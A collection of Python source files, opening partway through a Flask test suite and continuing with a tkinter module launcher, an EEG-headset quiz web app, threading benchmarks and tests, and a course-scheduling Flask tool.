@app.route('/test_filters_without_returning_categories/')
def test_filters2():
messages = flask.get_flashed_messages(category_filter=['message', 'warning'])
self.assert_equal(len(messages), 2)
self.assert_equal(messages[0], u'Hello World')
self.assert_equal(messages[1], flask.Markup(u'<em>Testing</em>'))
return ''
# Create new test client on each test to clean flashed messages.
c = app.test_client()
c.get('/')
c.get('/test/')
c = app.test_client()
c.get('/')
c.get('/test_with_categories/')
c = app.test_client()
c.get('/')
c.get('/test_filter/')
c = app.test_client()
c.get('/')
c.get('/test_filters/')
c = app.test_client()
c.get('/')
c.get('/test_filters_without_returning_categories/')
def test_request_processing(self):
app = flask.Flask(__name__)
evts = []
@app.before_request
def before_request():
evts.append('before')
@app.after_request
def after_request(response):
response.data += b'|after'
evts.append('after')
return response
@app.route('/')
def index():
self.assert_in('before', evts)
self.assert_not_in('after', evts)
return 'request'
self.assert_not_in('after', evts)
rv = app.test_client().get('/').data
self.assert_in('after', evts)
self.assert_equal(rv, b'request|after')
def test_after_request_processing(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
@flask.after_this_request
def foo(response):
response.headers['X-Foo'] = 'a header'
return response
return 'Test'
c = app.test_client()
resp = c.get('/')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.headers['X-Foo'], 'a header')
def test_teardown_request_handler(self):
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 200)
self.assert_in(b'Response', rv.data)
self.assert_equal(len(called), 1)
def test_teardown_request_handler_debug_mode(self):
called = []
app = flask.Flask(__name__)
app.testing = True
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 200)
self.assert_in(b'Response', rv.data)
self.assert_equal(len(called), 1)
def test_teardown_request_handler_error(self):
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request1(exc):
self.assert_equal(type(exc), ZeroDivisionError)
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.teardown_request
def teardown_request2(exc):
self.assert_equal(type(exc), ZeroDivisionError)
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.route('/')
def fails():
1 // 0
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 500)
self.assert_in(b'Internal Server Error', rv.data)
self.assert_equal(len(called), 2)
def test_before_after_request_order(self):
called = []
app = flask.Flask(__name__)
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route('/')
def index():
return '42'
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'42')
self.assert_equal(called, [1, 2, 3, 4, 5, 6])
def test_error_handling(self):
app = flask.Flask(__name__)
@app.errorhandler(404)
def not_found(e):
return 'not found', 404
@app.errorhandler(500)
def internal_server_error(e):
return 'internal server error', 500
@app.route('/')
def index():
flask.abort(404)
@app.route('/error')
def error():
1 // 0
c = app.test_client()
rv = c.get('/')
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, b'not found')
rv = c.get('/error')
self.assert_equal(rv.status_code, 500)
self.assert_equal(b'internal server error', rv.data)
def test_before_request_and_routing_errors(self):
app = flask.Flask(__name__)
@app.before_request
def attach_something():
flask.g.something = 'value'
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, b'value')
def test_user_error_handling(self):
class MyException(Exception):
pass
app = flask.Flask(__name__)
@app.errorhandler(MyException)
def handle_my_exception(e):
self.assert_true(isinstance(e, MyException))
return '42'
@app.route('/')
def index():
raise MyException()
c = app.test_client()
self.assert_equal(c.get('/').data, b'42')
def test_trapping_of_bad_request_key_errors(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/fail')
def fail():
flask.request.form['missing_key']
c = app.test_client()
self.assert_equal(c.get('/fail').status_code, 400)
app.config['TRAP_BAD_REQUEST_ERRORS'] = True
c = app.test_client()
try:
c.get('/fail')
except KeyError as e:
self.assert_true(isinstance(e, BadRequest))
else:
self.fail('Expected exception')
def test_trapping_of_all_http_exceptions(self):
app = flask.Flask(__name__)
app.testing = True
app.config['TRAP_HTTP_EXCEPTIONS'] = True
@app.route('/fail')
def fail():
flask.abort(404)
c = app.test_client()
try:
c.get('/fail')
except NotFound as e:
pass
else:
self.fail('Expected exception')
def test_enctype_debug_helper(self):
from flask.debughelpers import DebugFilesKeyError
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail', methods=['POST'])
def index():
return flask.request.files['foo'].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with app.test_client() as c:
try:
c.post('/fail', data={'foo': 'index.txt'})
except DebugFilesKeyError as e:
self.assert_in('no file contents were transmitted', str(e))
self.assert_in('This was submitted: "index.txt"', str(e))
else:
self.fail('Expected exception')
def test_response_creation(self):
app = flask.Flask(__name__)
@app.route('/unicode')
def from_unicode():
return u'Hällo Wörld'
@app.route('/string')
def from_string():
return u'Hällo Wörld'.encode('utf-8')
@app.route('/args')
def from_tuple():
return 'Meh', 400, {
'X-Foo': 'Testing',
'Content-Type': 'text/plain; charset=utf-8'
}
c = app.test_client()
self.assert_equal(c.get('/unicode').data, u'Hällo Wörld'.encode('utf-8'))
self.assert_equal(c.get('/string').data, u'Hällo Wörld'.encode('utf-8'))
rv = c.get('/args')
self.assert_equal(rv.data, b'Meh')
self.assert_equal(rv.headers['X-Foo'], 'Testing')
self.assert_equal(rv.status_code, 400)
self.assert_equal(rv.mimetype, 'text/plain')
def test_make_response(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response()
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, b'')
self.assert_equal(rv.mimetype, 'text/html')
rv = flask.make_response('Awesome')
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, b'Awesome')
self.assert_equal(rv.mimetype, 'text/html')
rv = flask.make_response('W00t', 404)
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, b'W00t')
self.assert_equal(rv.mimetype, 'text/html')
def test_make_response_with_response_instance(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response(
flask.jsonify({'msg': 'W00t'}), 400)
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.data, b'{\n "msg": "W00t"\n}')
self.assertEqual(rv.mimetype, 'application/json')
rv = flask.make_response(
flask.Response(''), 400)
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.data, b'')
self.assertEqual(rv.mimetype, 'text/html')
rv = flask.make_response(
flask.Response('', headers={'Content-Type': 'text/html'}),
400, [('X-Foo', 'bar')])
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.headers['Content-Type'], 'text/html')
self.assertEqual(rv.headers['X-Foo'], 'bar')
def test_url_generation(self):
app = flask.Flask(__name__)
@app.route('/hello/<name>', methods=['POST'])
def hello():
pass
with app.test_request_context():
self.assert_equal(flask.url_for('hello', name='test x'), '/hello/test%20x')
self.assert_equal(flask.url_for('hello', name='test x', _external=True),
'http://localhost/hello/test%20x')
def test_build_error_handler(self):
app = flask.Flask(__name__)
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
self.assertRaises(BuildError, flask.url_for, 'spam')
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for('spam')
except BuildError as err:
error = err
try:
raise RuntimeError('Test case where BuildError is not current.')
except RuntimeError:
self.assertRaises(BuildError, app.handle_url_build_error, error, 'spam', {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return '/test_handler/'
app.url_build_error_handlers.append(handler)
with app.test_request_context():
self.assert_equal(flask.url_for('spam'), '/test_handler/')
def test_custom_converters(self):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(',')
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ','.join(base_to_url(x) for x in value)
app = flask.Flask(__name__)
app.url_map.converters['list'] = ListConverter
@app.route('/<list:args>')
def index(args):
return '|'.join(args)
c = app.test_client()
self.assert_equal(c.get('/1,2,3').data, b'1|2|3')
def test_static_files(self):
app = flask.Flask(__name__)
app.testing = True
rv = app.test_client().get('/static/index.html')
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data.strip(), b'<h1>Hello World!</h1>')
with app.test_request_context():
self.assert_equal(flask.url_for('static', filename='index.html'),
'/static/index.html')
rv.close()
def test_none_response(self):
app = flask.Flask(__name__)
@app.route('/')
def test():
return None
try:
app.test_client().get('/')
except ValueError as e:
self.assert_equal(str(e), 'View function did not return a response')
pass
else:
self.assert_true("Expected ValueError")
def test_request_locals(self):
self.assert_equal(repr(flask.g), '<LocalProxy unbound>')
self.assertFalse(flask.g)
def test_test_app_proper_environ(self):
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return 'Foo'
@app.route('/', subdomain='foo')
def subdomain():
return 'Foo SubDomain'
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'Foo')
rv = app.test_client().get('/', 'http://localhost.localdomain:5000')
self.assert_equal(rv.data, b'Foo')
rv = app.test_client().get('/', 'https://localhost.localdomain:5000')
self.assert_equal(rv.data, b'Foo')
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'https://localhost.localdomain')
self.assert_equal(rv.data, b'Foo')
try:
app.config.update(SERVER_NAME='localhost.localdomain:443')
rv = app.test_client().get('/', 'https://localhost.localdomain')
# Werkzeug 0.8
self.assert_equal(rv.status_code, 404)
except ValueError as e:
# Werkzeug 0.7
self.assert_equal(str(e), "the server name provided " +
"('localhost.localdomain:443') does not match the " + \
"server name from the WSGI environment ('localhost.localdomain')")
try:
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'http://foo.localhost')
# Werkzeug 0.8
self.assert_equal(rv.status_code, 404)
except ValueError as e:
# Werkzeug 0.7
self.assert_equal(str(e), "the server name provided " + \
"('localhost.localdomain') does not match the " + \
"server name from the WSGI environment ('foo.localhost')")
rv = app.test_client().get('/', 'http://foo.localhost.localdomain')
self.assert_equal(rv.data, b'Foo SubDomain')
def test_exception_propagation(self):
def apprunner(configkey):
app = flask.Flask(__name__)
@app.route('/')
def index():
1 // 0
c = app.test_client()
if config_key is not None:
app.config[config_key] = True
try:
resp = c.get('/')
except Exception:
pass
else:
self.fail('expected exception')
else:
self.assert_equal(c.get('/').status_code, 500)
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in 'TESTING', 'PROPAGATE_EXCEPTIONS', 'DEBUG', None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
def test_max_content_length(self):
app = flask.Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 64
@app.before_request
def always_first():
flask.request.form['myfile']
self.assert_true(False)
@app.route('/accept', methods=['POST'])
def accept_file():
flask.request.form['myfile']
self.assert_true(False)
@app.errorhandler(413)
def catcher(error):
return '42'
c = app.test_client()
rv = c.post('/accept', data={'myfile': 'foo' * 100})
self.assert_equal(rv.data, b'42')
def test_url_processors(self):
app = flask.Flask(__name__)
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and \
app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
values.setdefault('lang_code', flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code', None)
@app.route('/<lang_code>/')
def index():
return flask.url_for('about')
@app.route('/<lang_code>/about')
def about():
return flask.url_for('something_else')
@app.route('/foo')
def something_else():
return flask.url_for('about', lang_code='en')
c = app.test_client()
self.assert_equal(c.get('/de/').data, b'/de/about')
self.assert_equal(c.get('/de/about').data, b'/foo')
self.assert_equal(c.get('/foo').data, b'/en/about')
def test_inject_blueprint_url_defaults(self):
app = flask.Flask(__name__)
bp = flask.Blueprint('foo.bar.baz', __name__,
template_folder='template')
@bp.url_defaults
def bp_defaults(endpoint, values):
values['page'] = 'login'
@bp.route('/<page>')
def view(page): pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults('foo.bar.baz.view', values)
expected = dict(page='login')
self.assert_equal(values, expected)
with app.test_request_context('/somepage'):
url = flask.url_for('foo.bar.baz.view')
expected = '/login'
self.assert_equal(url, expected)
def test_nonascii_pathinfo(self):
app = flask.Flask(__name__)
app.testing = True
@app.route(u'/киртест')
def index():
return 'Hello World!'
c = app.test_client()
rv = c.get(u'/киртест')
self.assert_equal(rv.data, b'Hello World!')
def test_debug_mode_complains_after_first_request(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/')
def index():
return 'Awesome'
self.assert_false(app.got_first_request)
self.assert_equal(app.test_client().get('/').data, b'Awesome')
try:
@app.route('/foo')
def broken():
return 'Meh'
except AssertionError as e:
self.assert_in('A setup function was called', str(e))
else:
self.fail('Expected exception')
app.debug = False
@app.route('/foo')
def working():
return 'Meh'
self.assert_equal(app.test_client().get('/foo').data, b'Meh')
self.assert_true(app.got_first_request)
def test_before_first_request_functions(self):
got = []
app = flask.Flask(__name__)
@app.before_first_request
def foo():
got.append(42)
c = app.test_client()
c.get('/')
self.assert_equal(got, [42])
c.get('/')
self.assert_equal(got, [42])
self.assert_true(app.got_first_request)
def test_routing_redirect_debugging(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/', methods=['GET', 'POST'])
def foo():
return 'success'
with app.test_client() as c:
try:
c.post('/foo', data={})
except AssertionError as e:
self.assert_in('http://localhost/foo/', str(e))
self.assert_in('Make sure to directly send your POST-request '
'to this URL', str(e))
else:
self.fail('Expected exception')
rv = c.get('/foo', data={}, follow_redirects=True)
self.assert_equal(rv.data, b'success')
app.debug = False
with app.test_client() as c:
rv = c.post('/foo', data={}, follow_redirects=True)
self.assert_equal(rv.data, b'success')
def test_route_decorator_custom_endpoint(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/')
def foo():
return flask.request.endpoint
@app.route('/bar/', endpoint='bar')
def for_bar():
return flask.request.endpoint
@app.route('/bar/123', endpoint='123')
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for('foo') == '/foo/'
assert flask.url_for('bar') == '/bar/'
assert flask.url_for('123') == '/bar/123'
c = app.test_client()
self.assertEqual(c.get('/foo/').data, b'foo')
self.assertEqual(c.get('/bar/').data, b'bar')
self.assertEqual(c.get('/bar/123').data, b'123')
def test_preserve_only_once(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail')
def fail_func():
1 // 0
c = app.test_client()
for x in range(3):
with self.assert_raises(ZeroDivisionError):
c.get('/fail')
self.assert_true(flask._request_ctx_stack.top is not None)
self.assert_true(flask._app_ctx_stack.top is not None)
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
self.assert_true(flask._request_ctx_stack.top is None)
self.assert_true(flask._app_ctx_stack.top is None)
def test_preserve_remembers_exception(self):
app = flask.Flask(__name__)
app.debug = True
errors = []
@app.route('/fail')
def fail_func():
1 // 0
@app.route('/success')
def success_func():
return 'Okay'
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
c = app.test_client()
# After this failure we did not yet call the teardown handler
with self.assert_raises(ZeroDivisionError):
c.get('/fail')
self.assert_equal(errors, [])
# But this request triggers it, and it's an error
c.get('/success')
self.assert_equal(len(errors), 2)
self.assert_true(isinstance(errors[0], ZeroDivisionError))
# At this point another request does nothing.
c.get('/success')
self.assert_equal(len(errors), 3)
self.assert_equal(errors[1], None)
def test_get_method_on_g(self):
app = flask.Flask(__name__)
app.testing = True
with app.app_context():
self.assert_equal(flask.g.get('x'), None)
self.assert_equal(flask.g.get('x', 11), 11)
flask.g.x = 42
self.assert_equal(flask.g.get('x'), 42)
self.assert_equal(flask.g.x, 42)
def test_g_iteration_protocol(self):
app = flask.Flask(__name__)
app.testing = True
with app.app_context():
flask.g.foo = 23
flask.g.bar = 42
self.assert_equal('foo' in flask.g, True)
self.assert_equal('foos' in flask.g, False)
self.assert_equal(sorted(flask.g), ['bar', 'foo'])
class SubdomainTestCase(FlaskTestCase):
def test_basic_support(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/')
def normal_index():
return 'normal index'
@app.route('/', subdomain='test')
def test_index():
return 'test index'
c = app.test_client()
rv = c.get('/', 'http://localhost/')
self.assert_equal(rv.data, b'normal index')
rv = c.get('/', 'http://test.localhost/')
self.assert_equal(rv.data, b'test index')
@emits_module_deprecation_warning
def test_module_static_path_subdomain(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'example.com'
from subdomaintestmodule import mod
app.register_module(mod)
c = app.test_client()
rv = c.get('/static/hello.txt', 'http://foo.example.com/')
rv.direct_passthrough = False
self.assert_equal(rv.data.strip(), b'Hello Subdomain')
rv.close()
def test_subdomain_matching(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost/')
self.assert_equal(rv.data, b'index for mitsuhiko')
def test_subdomain_matching_with_ports(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost:3000'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost:3000/')
self.assert_equal(rv.data, b'index for mitsuhiko')
@emits_module_deprecation_warning
def test_module_subdomain_support(self):
app = flask.Flask(__name__)
mod = flask.Module(__name__, 'test', subdomain='testing')
app.config['SERVER_NAME'] = 'localhost'
@mod.route('/test')
def test():
return 'Test'
@mod.route('/outside', subdomain='xtesting')
def bar():
return 'Outside'
app.register_module(mod)
c = app.test_client()
rv = c.get('/test', 'http://testing.localhost/')
self.assert_equal(rv.data, b'Test')
rv = c.get('/outside', 'http://xtesting.localhost/')
self.assert_equal(rv.data, b'Outside')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(BasicFunctionalityTestCase))
suite.addTest(unittest.makeSuite(SubdomainTestCase))
return suite
|
main.py | from tkinter import Tk, Button, Label
from threading import Thread
from queue import Queue
import configparser
import sys
import os
def init_config(path):
config.optionxform = str
config.read(path)
def maingui():
for name in tt['modules'].keys():
tt[name]['label'].config(text=str(tt[name].get('cnt', 0)),
bg=('lime' if (tt[name].get('is_working', False)) else 'white'))
root.after(1000, maingui)
def rstart(name):
if not tt[name].get('is_enable', True):
tt[name].update({'is_enable': True})
elif not tt[name].get('is_enable', False):
tt[name].update({'is_enable': True})
thread = Thread(target=eval(name), args=(tt,))
thread.daemon = True
thread.start()
def rstop(name):
if tt[name].get('is_enable', False):
tt[name].update({'is_enable': False})
if __name__ == '__main__':
root = Tk()
root.geometry('+200+200')
root.overrideredirect(0)
# uncomment for minimize
# root.iconify()
tt = {}
modules = []
if len(sys.argv) < 2:
path = './settings.ini'
else:
print(sys.argv[1])
path = './%s' % (sys.argv[1])
if not os.path.exists(path):
print('Settings file %s not found' % (path))
sys.exit()
config = configparser.ConfigParser()
init_config(path)
for section in config.sections():
tt.update({section.lower():dict(config[section])})
if section == 'MODULES':
for key in config[section]:
modules.append([key, config[section][key]])
exec('from modules.%s import %s' % (key, key))
for [name, autostart] in modules:
module = tt.get(name, {})
q = Queue()
module.update({'queue': q})
module.update({'cnt': 0})
tt.update({name: module})
for i, [name, autostart] in enumerate(modules):
module = tt.get(name, {})
Label(text=name).grid(row=i, column=0)
Button(text="Start", command=lambda x=name: rstart(x)).grid(row=i, column=1)
Button(text="Stop", command=lambda x=name: rstop(x)).grid(row=i, column=2)
label = Label(root, bg='white', text='0')
label.grid(row=i, column=3)
module.update({'label': label})
tt.update({name: module})
if autostart:
rstart(name)
root.after(100, maingui)
root.mainloop()
|
app.py | #!/usr/local/bin/python
import sys
import flaskwebgui
from flask import *
import read_mindwave_mobile
import threading
import att_model , lowa_model , lowb_model
import matplotlib.pyplot as plt
app = Flask(__name__)
ui = flaskwebgui.FlaskUI(app)
class datapackMW :
Delta = []
Theta = []
LowAlpha = []
HighAlpha = []
LowBeta = []
HighBeta = []
LowGamma = []
MedGamma = []
AttentionLevel = []
PoorSignalLevel = []
Unknowdatapoint = []
MeditationLevel = []
def print_end() :
print('end')
def render_measure() :
t = threading.Thread(target= read_mindwave_mobile.start_measure)
t.run()
return render_template("measure.html")
class backpack :
question = ["0", "1" , "2" , "3" , "4" , "5" , "6" , "7" , "8" , "9" , "10"]
curr_question = 1
score = 0
Name = ""
age = 0
sex = 0
# for sex
# 0 = male
# 1 = female
@app.route("/")
def render_main() :
backpack.curr_question = 1
backpack.score = 0
backpack.name = ""
backpack.age = 0
backpack.sex = 0
return render_template("index.html")
@app.route("/info")
def render_info() :
return render_template("info.html")
@app.route("/registeration")
def render_register() :
return render_template("register.html")
@app.route("/formhandler" , methods=["POST"])
def do_sth_with_data() :
backpack.age = request.form.get("age")
backpack.name = request.form.get("name")
backpack.sex = request.form.get("sex")
print(backpack.age,"\n")
print(backpack.name,"\n")
print(backpack.sex,"\n")
return redirect("/choicequiz")
@app.route("/choicequiz")
def render_quiz() :
return render_template("quiz.html" , question = backpack.question[backpack.curr_question])
@app.route("/quizhandler" , methods=['POST'])
def redirect_to_quiz() :
backpack.score += int(request.form.get("score"))
print(backpack.score)
backpack.curr_question+=1
if(backpack.curr_question > 9) :
return redirect("/mindwave")
else :
return redirect("/choicequiz")
@app.route("/mindwave")
def render_mindwave() :
return render_template("choose.html")
@app.route("/mindwave_test")
def render_mindwave_test() :
t = threading.Thread(target= read_mindwave_mobile.start_measure)
try :
t.start()
except :
return render_template("error.html")
return render_template("handler.html")
@app.route("/mindwave_test_case2")
def render_mindwave_test2() :
t = threading.Thread(target= read_mindwave_mobile.start_measure)
try :
t.start()
except :
return render_template("error.html")
return render_template("mindwave_test_plan2.html")
@app.route('/slide_txt')
def reds() :
return render_template('mindwave_test.html')
@app.route('/slideshow')
def redss() :
return render_template('mindwave_test2.html')
@app.route("/result")
def render_result() :
read_mindwave_mobile.datapack.kill_code = True
datapackMW.Delta += read_mindwave_mobile.Delta
datapackMW.Theta += read_mindwave_mobile.Theta
datapackMW.LowAlpha += read_mindwave_mobile.LowAlpha
datapackMW.HighAlpha += read_mindwave_mobile.HighAlpha
datapackMW.LowBeta += read_mindwave_mobile.LowBeta
datapackMW.HighBeta += read_mindwave_mobile.HighBeta
datapackMW.LowGamma += read_mindwave_mobile.LowGamma
datapackMW.MedGamma += read_mindwave_mobile.MedGamma
datapackMW.AttentionLevel += read_mindwave_mobile.AttentionLevel
datapackMW.MeditationLevel += read_mindwave_mobile.MeditationLevel
t = threading.Thread(target = print_end)
t.run()
return redirect('/result_handler')
@app.route("/exit_app")
def exitapp() :
sys.exit("Cant connect to the bluetooth")
@app.route("/result_handler")
def render_result_renderer() :
print('stopping')
Att_result = att_model.predict([datapackMW.AttentionLevel[19:47]])
Worr_result = lowb_model.predict([datapackMW.LowBeta[19:47]])
Happi_result = lowa_model.predict([datapackMW.LowAlpha[19:47]])
print({'Att' : Att_result , 'Happ' : Happi_result , 'Worr' : Worr_result})
print("END")
predict_handler = {'Att' : Att_result , 'Happ' : Happi_result , 'Worr' : Worr_result}
MwScore = 0
if (predict_handler['Att'] == 0) :
MwScore+= int(0.8846*35)
else :
MwScore += 0
if (predict_handler['Happ'] == 0) :
MwScore+= int(0.8823*35)
else :
MwScore += 0
if (predict_handler['Worr'] == 0) :
MwScore+= int(0.8214*35)
else :
MwScore += 0
case = str()
if(backpack.score + MwScore <= 21 + 9) :
case = '0'
elif (backpack.score + MwScore <= 42 + 18) :
case = '1'
elif (backpack.score + MwScore <= 63 + 27) :
case = '2'
elif (backpack.score + MwScore <= 84 + 36) :
case = '3'
elif (backpack.score + MwScore <= 105 + 45) :
case = '4'
overallscore = MwScore + backpack.score
backpack.name.replace(" " , '%20')
link_togo = 'http://app.montfort.ac.th/the-hermit/api' + '?n='
link_togo += str(backpack.name.replace(' ','%20')) + '&a=' + str(backpack.age) + '&os=' + str(overallscore)
link_togo += '&ms=' + str(MwScore) + '&c='
link_togo += str(backpack.score) + '&s=' + str(case)
link_togo += '&hs=' + str(predict_handler['Happ']) + '&ws='
link_togo += str(predict_handler['Worr']) + '&atts=' + str(predict_handler['Att'])
print(link_togo)
print(backpack.name , backpack.age , MwScore , backpack.score , predict_handler['Happ'] , predict_handler['Worr'] , predict_handler['Att'] , case)
percent_choice = int(backpack.score/45*100)/100
percent_mindwave = int(MwScore/105 * 100)/100
percent_all = int(overallscore/150*100)/100
return render_template("result.html" , link_togo = link_togo , status = case , cp = percent_choice , mp = percent_mindwave , op = percent_all)
app.run(debug=True)
|
speed.py |
from time import sleep, perf_counter
from threading import Thread
def task1():
count = 111111
while True:
if count == 222221:
break
count += 1
def task2():
count = 222222
while True:
if count == 333332:
break
count += 1
def task3():
count = 11111111
while True:
if count == 56844357:
print("ok")
elif count == 99999999:
break
count += 1
start_time = perf_counter()
# create two new threads
t1 = Thread(target=task1)
t2 = Thread(target=task2)
t3 = Thread(target=task3)
# start the threads
t1.start()
t2.start()
t3.start()
# wait for the threads to complete
t1.join()
t2.join()
t3.join()
end_time = perf_counter()
print(f'It took {end_time- start_time: 0.2f} second(s) to complete.') |
queue_threads.py | import unittest
import json
import time
from functools import wraps
from threading import Thread, Lock
from app import app
from data.queue import WorkQueue
from initdb import wipe_database, initialize_database, populate_database
QUEUE_NAME = 'testqueuename'
class AutoUpdatingQueue(object):
def __init__(self, queue_to_wrap):
self._queue = queue_to_wrap
def _wrapper(self, func):
@wraps(func)
def wrapper(*args, **kwargs):
to_return = func(*args, **kwargs)
self._queue.update_metrics()
return to_return
return wrapper
def __getattr__(self, attr_name):
method_or_attr = getattr(self._queue, attr_name)
if callable(method_or_attr):
return self._wrapper(method_or_attr)
else:
return method_or_attr
class QueueTestCase(unittest.TestCase):
TEST_MESSAGE_1 = json.dumps({'data': 1})
def setUp(self):
self.transaction_factory = app.config['DB_TRANSACTION_FACTORY']
self.queue = AutoUpdatingQueue(WorkQueue(QUEUE_NAME, self.transaction_factory))
wipe_database()
initialize_database()
populate_database()
class TestQueueThreads(QueueTestCase):
def test_queue_threads(self):
count = [20]
for i in range(count[0]):
self.queue.put([str(i)], self.TEST_MESSAGE_1)
lock = Lock()
def get(lock, count, queue):
item = queue.get()
if item is None:
return
self.assertEqual(self.TEST_MESSAGE_1, item.body)
with lock:
count[0] -= 1
threads = []
# The thread count needs to be a few times higher than the queue size
# count because some threads will get a None and thus won't decrement
# the counter.
for i in range(100):
t = Thread(target=get, args=(lock, count, self.queue))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(count[0], 0)
if __name__ == '__main__':
unittest.main()
|
huji_cheese.py | import datetime
import json
import os
from threading import Thread
from urllib.parse import urlsplit
from flask import Flask, render_template, request, redirect
from cheese_proxied_browser import CheeseProxiedBrowser
from collectors import DigmiAllCoursesCollector
from downloader import download_courses, COURSE_FILE_TEMPLATE
from utils import Semester
CHEESEFORK_URL = 'https://cheesefork.cf/'
DOWNLOAD_FOLDER = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'downloaded_courses')
class HujiCheese:
"""
A class that controls the flask app and the proxied browser
"""
def __init__(self, flask_host: str = 'localhost', flask_port: int = 5000):
self._proxied_browser = CheeseProxiedBrowser(initial_page=f'http://{flask_host}:{flask_port}',
replacement_domain=urlsplit(CHEESEFORK_URL).hostname)
# Configure flask app and endpoints
self._flask_app = Flask(__name__)
self._flask_app.add_url_rule('/year/<year>', view_func=self.year_index, methods=['GET', 'POST'])
self._flask_app.add_url_rule('/', view_func=self.index, methods=['GET'])
self._flask_host = flask_host
self._flask_port = flask_port
async def index(self):
"""
Main page. Redirects to the year page.
"""
year = datetime.date.today().year
return redirect(f'/year/{year}')
async def year_index(self, year):
"""
The year page - includes all the courses for a certain year.
"""
if request.method == 'GET':
result = await DigmiAllCoursesCollector(year).acollect()
return render_template("index.html", courses=result)
# Collect form data
semester = Semester.from_string(request.form.get('semester'))
courses = request.form.getlist('courses')
should_recreate = True if request.form.get('recreate') else False
# Get/Create folder of existing courses
try:
existing_course_ids = set(os.listdir(DOWNLOAD_FOLDER))
except FileNotFoundError:
os.mkdir(DOWNLOAD_FOLDER)
existing_course_ids = set()
# Get course IDs to download
if should_recreate:
course_ids_to_download = list(courses)
else:
course_ids_to_download = []
for course_id in courses:
expected_course_file = COURSE_FILE_TEMPLATE.format(course=course_id, year=year,
semester=semester)
if expected_course_file in existing_course_ids:
continue
course_ids_to_download.append(course_id)
# Download missing courses
if course_ids_to_download:
await download_courses(course_ids_to_download, semester=semester, year=year, output_dir=DOWNLOAD_FOLDER)
# Read all courses from files
course_data = {}
for course_id in courses:
file_path = os.path.join(DOWNLOAD_FOLDER,
COURSE_FILE_TEMPLATE.format(course=course_id, year=year,
semester=int(semester)))
with open(file_path, 'r') as f:
course_data[course_id] = json.load(f)
# Build javascript variable
js_variable = f'var courses_from_rishum = {json.dumps(list(course_data.values()), ensure_ascii=False)}'
# Reload the addon that alters the courses in Cheesefork.
self._proxied_browser.replacement_value = js_variable
self._proxied_browser.reload_course_replacement()
return redirect(CHEESEFORK_URL)
